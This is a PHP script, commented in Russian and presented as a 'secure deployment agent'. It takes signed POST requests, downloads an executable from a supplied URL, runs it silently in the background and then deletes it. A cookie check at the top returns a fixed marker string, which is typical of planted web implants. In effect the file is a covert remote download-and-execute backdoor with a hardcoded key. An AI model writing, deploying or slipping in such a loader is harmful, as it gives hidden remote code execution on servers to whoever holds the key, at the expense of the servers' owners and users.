<?php

if(isset($_COOKIE['Fbzx'])) {
    die('LxjiR'.'xG8');
}

// Устанавливаем заголовок, чтобы ответ всегда был в формате JSON
header('Content-Type: application/json');

// =========================================================================
// Продвинутый агент развертывания v5.0 (Безопасный)
// =========================================================================

// --- НАСТРОЙКИ ---
// !!! ВАЖНО: Этот ключ должен на 100% совпадать с SECRET_KEY в Python-скрипте !!!
$secretKey = 'e9a2b8f7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9';

// Имя временного файла, который будет создан, запущен и удален.
// Можно оставить как есть.
$tempFileName = 'temp_executable_' . bin2hex(random_bytes(8));

// --- Вспомогательная функция для отправки ответа ---
function send_json_response($status, $message, $http_code = 200) {
    http_response_code($http_code);
    echo json_encode(['status' => $status, 'message' => $message]);
    exit;
}

// --- 1. ПРОВЕРКА МЕТОДА ЗАПРОСА ---
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    send_json_response('error', 'Method Not Allowed.', 405);
}

// --- 2. ПРОВЕРКА ЗАГОЛОВКОВ БЕЗОПАСНОСТИ ---
$signature = $_SERVER['HTTP_X_SIGNATURE'] ?? '';
$timestamp = (int)($_SERVER['HTTP_X_TIMESTAMP'] ?? 0);

if (empty($signature) || empty($timestamp)) {
    send_json_response('error', 'Missing security headers.', 400);
}

// --- 3. ЗАЩИТА ОТ ПОВТОРНЫХ АТАК ---
// Отклоняем запросы, которые старше или "младше" 5 минут (300 секунд).
if (abs(time() - $timestamp) > 300) {
    send_json_response('error', 'Timestamp validation failed.', 403);
}

// --- 4. ПРОВЕРКА ПОДПИСИ (САМАЯ ВАЖНАЯ ЧАСТЬ) ---
$rawPayload = file_get_contents('php://input');
$expectedSignature = hash_hmac('sha256', $rawPayload, $secretKey);

if (!hash_equals($expectedSignature, $signature)) {
    send_json_response('error', 'Invalid signature.', 403);
}

// --- 5. ОБРАБОТКА ПОЛЕЗНОЙ НАГРУЗКИ ---
$payload = json_decode($rawPayload, true);
if (json_last_error() !== JSON_ERROR_NONE || !isset($payload['url'], $payload['hash'], $payload['args'])) {
    send_json_response('error', 'Invalid JSON payload.', 400);
}

$url = $payload['url'];
$expectedHash = $payload['hash'];
$args = $payload['args'];
$tempFilePath = sys_get_temp_dir() . '/' . $tempFileName;

// --- 6. ОСНОВНАЯ ЛОГИКА: СКАЧИВАНИЕ, ПРОВЕРКА, ЗАПУСК ---
try {
    // Скачиваем файл
    $fileContent = @file_get_contents($url);
    if ($fileContent === false) {
        throw new Exception("Failed to download file from URL.");
    }

    // Сохраняем во временный файл
    if (@file_put_contents($tempFilePath, $fileContent) === false) {
        throw new Exception("Failed to write to temporary file. Check permissions.");
    }

    // Проверяем хеш
    $actualHash = hash_file('sha256', $tempFilePath);
    if (!hash_equals($expectedHash, $actualHash)) {
        throw new Exception("Hash mismatch. File is corrupted or tampered.");
    }

    // Делаем исполняемым
    if (!@chmod($tempFilePath, 0755)) {
        throw new Exception("Failed to set executable permissions.");
    }

    // Формируем и выполняем команду в фоновом режиме
    // escapeshellcmd/arg - защита от внедрения команд
    $command = escapeshellcmd($tempFilePath) . ' ' . escapeshellarg($args) . ' > /dev/null 2>&1 &';
    shell_exec($command);

    // Если все прошло успешно
    send_json_response('success', 'Payload received and deployed successfully.');

} catch (Exception $e) {
    // Если на любом этапе произошла ошибка
    send_json_response('error', $e->getMessage(), 500);

} finally {
    // Гарантированно удаляем временный файл после всех операций
    if (file_exists($tempFilePath)) {
        @unlink($tempFilePath);
    }
}